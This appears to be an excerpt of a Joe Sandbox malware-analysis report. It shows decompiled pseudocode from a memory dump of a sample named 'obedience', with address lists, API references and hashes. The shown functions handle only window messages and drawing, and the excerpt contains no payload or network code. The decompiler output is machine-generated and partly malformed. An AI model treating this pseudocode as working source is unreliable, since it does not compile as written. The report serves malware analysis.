										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t370 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00419C84(_v8, _t292, _t363);
									_t292 = _v17;
									_v16 = E00457BFC(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t363 = _t363 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00441A70( *((intOrPtr*)(_v16 + 0x58)), _t292,  &_v52, __eflags);
								_t165 =  *0x48f840; // 0x490b7c
								E00464FF0( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t364 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00419C84(_v8, _t292, _t364);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t370 + 8);
										if(_t173 ==  *(_t370 + 8)) {
											break;
										}
										_t292 = 1;
										_t177 = E00457BFC(_v48, 1,  *(_t370 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t364 = _t364 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0045852C(_v48, _t370);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t375 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t365 = 0;
							__eflags = 0;
							while(1) {
								E00419C84(_v8, _t292, _t365);
								_t181 = E00457C9C( *(_t370 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t365 = _t365 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t366 = 0;
								__eflags = 0;
								while(1) {
									_t186 = E00419C84(_v8, _t292, _t366);
									_t292 = 0;
									_v16 = E00457BFC(_t186, 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t366 = _t366 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E00426448(0, 1);
								_push(_t372);
								_push(0x458ca2);
								_push( *[fs:eax]);
								 *[fs:eax] = _t374;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t372);
								_push(0x458c85);
								_push( *[fs:eax]);
								 *[fs:eax] = _t374;
								E00426B80(_v24,  *(_v40 + 0x18));
								E00426A20(_v24);
								E00459114(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t328);
								 *[fs:eax] = _t328;
								_push(0x458c8c);
								__eflags = 0;
								E00426B80(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t367 = 0;
									__eflags = 0;
									while(1) {
										_t218 = E00419C84(_v8, _t292, _t367);
										_t292 = 0;
										_v16 = E00457BFC(_t218, 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t367 = _t367 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00407768();
									_v32 = _t221;
									 *[fs:eax] = _t374;
									_v24 = E00426448(0, 1);
									 *[fs:eax] = _t374;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t374;
									E00426B80(_v24, _v32);
									E00426A20(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x458da3, _t372,  *[fs:eax], 0x458dc0, _t372,  *[fs:eax], 0x458de5, _t372, _t221);
									_pop(_t337);
									 *[fs:eax] = _t337;
									_push(0x458daa);
									__eflags = 0;
									E00426B80(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t368 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00419C84(_v8, _t292, _t368))) + 0x34))();
											_t341 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t341 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t341 + 0xc))) {
												_t253 = E00419C84(_v8, _t292, _t368);
												_t292 = 1;
												_v16 = E00457BFC(_t253, 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00419C84(_v8, _t292, _t368) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t368 = _t368 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E00457C2C(E00419C84(_v8, _t292, _t368), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00419C84(_v8, 1, _t368);
											__eflags = 0;
											_t257 = E00457C2C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t348 =  *0x48f9b8; // 0x490b80
										_t56 =  *_t348 + 0x6c; // 0x0
										_t350 =  *_t56;
										__eflags = _t350;
										if(_t350 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t350 + 0x158);
											}
											__eflags =  *(_t350 + 0x228) & 0x00000008;
											if(( *(_t350 + 0x228) & 0x00000008) == 0) {
												_t351 =  *0x48f840; // 0x490b7c
												E00464C64( *_t351, _t291, _t257, _t368, _t370);
											} else {
												E00464CEC();
											}
										}
									}
								} else {
									L67:
									_push( *(_t370 + 8));
									_push( *(_t370 + 4));
									_push( *_t370);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00407550();
									 *((intOrPtr*)(_t370 + 0xc)) = _t144;
								}
								L68:
								_pop(_t306);
								 *[fs:eax] = _t306;
								_push(0x458e76);
								return E00404A40( &_v52);
							}
						}
					}
				}
				L69:
			}





































































      0x0045893d
      0x0045893f
      0x00458945
      0x00458947
      0x0045894a
      0x0045894c
      0x00458951
      0x00458952
      0x00458957
      0x0045895a
      0x0045895d
      0x0045895f
      0x00458964
      0x00458986
      0x00458986
      0x0045898b
      0x004589da
      0x004589db
      0x004589dd
      0x00000000
      0x004589e3
      0x004589e3
      0x004589e4
      0x004589e4
      0x004589e6
      0x004589f3
      0x004589f8
      0x004589fa
      0x00000000
      0x00000000
      0x00458a00
      0x00458a01
      0x00458a01
      0x00458a02
      0x00000000
      0x00458a04
      0x00000000
      0x00458a04
      0x00000000
      0x00458a02
      0x004589e6
      0x0045898d
      0x0045898d
      0x0045898d
      0x00458990
      0x00458a09
      0x00458a0d
      0x00458a11
      0x00458a13
      0x00458a13
      0x00458a1d
      0x00458a1e
      0x00458a20
      0x00458a96
      0x00458a96
      0x00458a9f
      0x00000000
      0x00458a22
      0x00458a22
      0x00458a23
      0x00458a23
      0x00458a25
      0x00458a25
      0x00458a29
      0x00458a4f
      0x00458a2b
      0x00458a2b
      0x00458a2e
      0x00458a30
      0x00458a42
      0x00458a32
      0x00458a3d
      0x00458a3d
      0x00458a30
      0x00458a57
      0x00458a5c
      0x00458a67
      0x00458a6a
      0x00458a6e
      0x00000000
      0x00000000
      0x00458a92
      0x00458a93
      0x00458a93
      0x00458a94
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00458a94
      0x00458a79
      0x00458a81
      0x00458a88
      0x00458a88
      0x00458992
      0x00458992
      0x00458993
      0x00458dfc
      0x00458dfd
      0x00458dff
      0x00000000
      0x00458e01
      0x00458e01
      0x00458e02
      0x00458e02
      0x00458e04
      0x00458e0e
      0x00458e16
      0x00458e19
      0x00458e1c
      0x00000000
      0x00000000
      0x00458e21
      0x00458e26
      0x00458e2b
      0x00458e2d
      0x00458e3b
      0x00458e3c
      0x00458e3c
      0x00458e3d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00458e2d
      0x00458e34
      0x00458e34
      0x00458999
      0x00000000
      0x00458999
      0x00458993
      0x00458990
      0x00000000
      0x00458966
      0x00458966
      0x004589a4
      0x004589a5
      0x004589a7
      0x00000000
      0x004589ad
      0x004589ad
      0x004589ae
      0x004589ae
      0x004589b0
      0x004589b5
      0x004589be
      0x004589c3
      0x004589c5
      0x00000000
      0x00000000
      0x004589cb
      0x004589cc
      0x004589cc
      0x004589cd
      0x00000000
      0x004589cf
      0x00000000
      0x004589cf
      0x00000000
      0x004589cd
      0x004589b0
      0x00000000
      0x00458968
      0x00458968
      0x0045896b
      0x00458bae
      0x00458bb7
      0x00458bb8
      0x00458bba
      0x00000000
      0x00458bc0
      0x00458bc0
      0x00458bc1
      0x00458bc1
      0x00458bc3
      0x00458bc8
      0x00458bd3
      0x00458bda
      0x00458bdd
      0x00458be1
      0x00000000
      0x00000000
      0x00458ca9
      0x00458caa
      0x00458caa
      0x00458cab
      0x00000000
      0x00458cb1
      0x00000000
      0x00458cb1
      0x00000000
      0x00458cab
      0x00458bf3
      0x00458bf8
      0x00458bf9
      0x00458bfe
      0x00458c01
      0x00458c10
      0x00458c15
      0x00458c16
      0x00458c1b
      0x00458c1e
      0x00458c2a
      0x00458c3f
      0x00458c58
      0x00458c5f
      0x00458c62
      0x00458c65
      0x00458c6a
      0x00458c6f
      0x00458c84
      0x00458c84
      0x00458971
      0x00458971
      0x00458972
      0x00458cb9
      0x00458cc2
      0x00458cc3
      0x00458cc5
      0x00000000
      0x00458ccb
      0x00458ccb
      0x00458ccc
      0x00458ccc
      0x00458cce
      0x00458cd3
      0x00458cde
      0x00458ce5
      0x00458ce8
      0x00458cec
      0x00000000
      0x00000000
      0x00458dec
      0x00458ded
      0x00458ded
      0x00458dee
      0x00000000
      0x00458df4
      0x00000000
      0x00458df4
      0x00000000
      0x00458dee
      0x00458cf5
      0x00458cf9
      0x00458cfe
      0x00458d0c
      0x00458d1b
      0x00458d29
      0x00458d35
      0x00458d43
      0x00458d4c
      0x00458d61
      0x00458d7b
      0x00458d80
      0x00458d83
      0x00458d86
      0x00458d8b
      0x00458d90
      0x00458da2
      0x00458da2
      0x00458978
      0x0045897b
      0x00458aac
      0x00458ab5
      0x00458ab6
      0x00458ab8
      0x00000000
      0x00458abe
      0x00458abe
      0x00458abf
      0x00458abf
      0x00458ac1
      0x00458acd
      0x00458ad0
      0x00458ad3
      0x00458ad6
      0x00458aef
      0x00458afa
      0x00458b01
      0x00458ad8
      0x00458ae5
      0x00458ae5
      0x00458b04
      0x00458b08
      0x00000000
      0x00000000
      0x00458b9e
      0x00458b9f
      0x00458b9f
      0x00458ba0
      0x00000000
      0x00458ba6
      0x00000000
      0x00458ba6
      0x00000000
      0x00458ba0
      0x00458b20
      0x00458b25
      0x00458b27
      0x00458b2e
      0x00458b39
      0x00458b3b
      0x00458b3b
      0x00458b40
      0x00458b48
      0x00458b48
      0x00458b4b
      0x00458b4d
      0x00458b53
      0x00458b55
      0x00458b5c
      0x00458b5c
      0x00458b68
      0x00458b6f
      0x00458b8b
      0x00458b94
      0x00458b71
      0x00458b81
      0x00458b81
      0x00458b6f
      0x00458b4d
      0x00458981
      0x00458e3f
      0x00458e42
      0x00458e46
      0x00458e49
      0x00458e4d
      0x00458e50
      0x00458e51
      0x00458e56
      0x00458e56
      0x00458e59
      0x00458e5b
      0x00458e5e
      0x00458e61
      0x00458e6e
      0x00458e6e
      0x00458972
      0x0045896b
      0x00458966
      0x00000000

      APIs
      • SaveDC.GDI32(?), ref: 00458C0B
      • RestoreDC.GDI32(?,?), ref: 00458C7F
      • 73BEB080.USER32(?,00000000,00458E6F), ref: 00458CF9
      • SaveDC.GDI32(?), ref: 00458D30
      • RestoreDC.GDI32(?,?), ref: 00458D9D
      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00458E6F), ref: 00458E51
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: RestoreSave$B080NtdllProc_Window
      • String ID:
      • API String ID: 4024241980-0
      • Opcode ID: 220435ccf59b5a208c08e6b2ee9c267569ab4683f73b980dac452d85e1d94dc8
      • Instruction ID: 8431f3ec98f4d46109bfef44b14c3c17a4ea528e88fb031c415560bdb8fb9393
      • Opcode Fuzzy Hash: 220435ccf59b5a208c08e6b2ee9c267569ab4683f73b980dac452d85e1d94dc8
      • Instruction Fuzzy Hash: EAE14A74A042059FDB10EFA9C88199EB7F5FF88305B21856AE805E7362DF38ED45CB58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045DB80 Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
      Download Yara Rule
      C-Code - Quality: 92%
      			E0045DB80(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403DF8(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403DF8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x45dfb4; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x45dfb0);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x45dfb0)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x48ee24;
							if( *0x48ee24 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E0044B158(_t133);
												}
											}
										} else {
											_t136 = E0045E4AC(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E0044B158(E0045E4AC(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E00457BFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E00426448(0, 1);
											_push(_t258);
											_push(0x45ddf9);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x45dddc);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E00426B80(_v16,  *(_v24 + 0x18));
											E00426A20(_v16);
											E00459114(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x45dde3);
											__eflags = 0;
											E00426B80(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E00457BFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E0044B158(_v8);
												L00407768();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E00426448(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E00426B80(_v16, _v20);
												E00426A20(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x45dee3, _t258,  *[fs:eax], 0x45df00, _t258,  *[fs:eax], 0x45df27, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x45deea);
												__eflags = 0;
												E00426B80(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x490b88; // 0xc089
									if(_t267 == 0) {
										E00445AE8(_v8, 0, 0xb025, 0);
										E00445AE8(_v8, 0, 0xb024, 0);
										E00445AE8(_v8, 0, 0xb035, 0);
										E00445AE8(_v8, 0, 0xb009, 0);
										E00445AE8(_v8, 0, 0xb008, 0);
										E00445AE8(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E00448B44(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}








































      0x0045db81
      0x0045db83
      0x0045db89
      0x0045db8b
      0x0045db8e
      0x0045db90
      0x0045db92
      0x0045db95
      0x0045dbba
      0x0045dbba
      0x0045dbc0
      0x0045dc6c
      0x0045dc73
      0x0045dc80
      0x0045dc80
      0x0045dbc6
      0x0045dbc6
      0x0045dbc7
      0x0045dc4b
      0x0045dc52
      0x0045dc5f
      0x0045dc5f
      0x0045dbc9
      0x00000000
      0x0045dbc9
      0x0045dbc7
      0x00000000
      0x0045db97
      0x0045db97
      0x0045dc8a
      0x0045dc98
      0x0045dc9f
      0x0045dca2
      0x0045dca8
      0x0045dcb2
      0x0045dcb4
      0x0045dcb6
      0x0045dcb9
      0x0045dcc0
      0x0045dcc2
      0x0045dcc5
      0x0045dcc5
      0x0045dcc5
      0x0045dcc5
      0x0045dcc0
      0x0045dcd2
      0x0045dcd2
      0x0045dcd4
      0x0045dcde
      0x0045dce7
      0x0045dce7
      0x0045dce9
      0x0045dcf3
      0x0045dcf6
      0x0045dceb
      0x0045dceb
      0x0045dced
      0x00000000
      0x00000000
      0x0045dced
      0x0045dcd6
      0x0045dcd6
      0x0045dcd8
      0x00000000
      0x00000000
      0x0045dcd8
      0x0045dcd4
      0x00000000
      0x0045db9d
      0x0045dba0
      0x0045dba3
      0x0045dbce
      0x0045dbd5
      0x0045dbdb
      0x0045dbde
      0x00000000
      0x0045dbe4
      0x0045dbe4
      0x0045dbe7
      0x0045dbeb
      0x00000000
      0x0045dbf1
      0x0045dbf1
      0x0045dbf3
      0x0045dbf6
      0x0045dbfd
      0x0045dc1f
      0x0045dc25
      0x0045dc27
      0x0045dc29
      0x0045dc2c
      0x0045dc33
      0x0045dc33
      0x0045dc2c
      0x0045dbff
      0x0045dc02
      0x0045dc07
      0x0045dc09
      0x0045dc18
      0x0045dc18
      0x0045dc09
      0x0045dc35
      0x0045dc37
      0x00000000
      0x0045dc3d
      0x0045dc3e
      0x0045dc3e
      0x0045dc37
      0x0045dbeb
      0x0045dbde
      0x00000000
      0x0045dba5
      0x0045dba5
      0x0045dba8
      0x0045dd02
      0x0045dd08
      0x0045dd0b
      0x00000000
      0x0045dd11
      0x0045dd11
      0x0045dd14
      0x0045dd1b
      0x00000000
      0x0045dd21
      0x0045dd37
      0x0045dd39
      0x0045dd3b
      0x00000000
      0x0045dd41
      0x0045dd4d
      0x0045dd52
      0x0045dd53
      0x0045dd58
      0x0045dd5b
      0x0045dd6a
      0x0045dd6f
      0x0045dd70
      0x0045dd75
      0x0045dd78
      0x0045dd84
      0x0045dd97
      0x0045ddaf
      0x0045ddb6
      0x0045ddb9
      0x0045ddbc
      0x0045ddc1
      0x0045ddc6
      0x0045dddb
      0x0045dddb
      0x0045dd3b
      0x0045dd1b
      0x0045dbae
      0x0045dbaf
      0x0045de00
      0x0045de03
      0x0045de06
      0x00000000
      0x0045de0c
      0x0045de0c
      0x0045de0f
      0x0045de16
      0x00000000
      0x0045de1c
      0x0045de2f
      0x0045de31
      0x0045de33
      0x00000000
      0x0045de39
      0x0045de3c
      0x0045de42
      0x0045de47
      0x0045de55
      0x0045de64
      0x0045de72
      0x0045de7e
      0x0045de8c
      0x0045de95
      0x0045dea8
      0x0045debb
      0x0045dec0
      0x0045dec3
      0x0045dec6
      0x0045decb
      0x0045ded0
      0x0045dee2
      0x0045dee2
      0x0045de33
      0x0045de16
      0x0045dbb5
      0x0045df2e
      0x0045df2e
      0x0045df34
      0x0045df42
      0x0045df53
      0x0045df64
      0x0045df75
      0x0045df86
      0x0045df97
      0x0045df97
      0x0045df9c
      0x0045dfa1
      0x0045dfa6
      0x0045dfac
      0x0045dfac
      0x0045dbaf
      0x0045dba8
      0x0045dba3
      0x0045db97

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: RestoreSave$B080Focus
      • String ID:
      • API String ID: 809140284-0
      • Opcode ID: a87bd35593b718b27a4310cd315fc2e46a330e0b1320dfec8607c338046f0d76
      • Instruction ID: 7b91dcdbca48a2c96d6c23b89de624c5751d44b1714c560a1ce24be4cba5d013
      • Opcode Fuzzy Hash: a87bd35593b718b27a4310cd315fc2e46a330e0b1320dfec8607c338046f0d76
      • Instruction Fuzzy Hash: C4B18135E001049FDB21DF69C886AAEB7F5EF09309F2544A6F801E7366C738AE44CB58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00463FFC Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
      Download Yara Rule
      C-Code - Quality: 38%
      			E00463FFC(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00462F54( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0044B158( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407550();
						}
					}
					_t26 =  *0x48f6b0; // 0x490904
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x48f6b0; // 0x490904
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0045EB54(_t36, 0);
						E00460F78( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00463648(_t51);
					_t21 =  *0x490b80; // 0x2480e74
					_t15 = _t21 + 0x64; // 0x0
					_t55 =  *_t15;
					if( *_t15 != 0) {
						_t21 = SetFocus(E0044B158(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











      0x00463ffe
      0x00464004
      0x0046400b
      0x00464015
      0x0046401e
      0x00464058
      0x00464060
      0x0046402f
      0x0046403d
      0x0046403f
      0x00000000
      0x00464041
      0x00464041
      0x00464043
      0x00464048
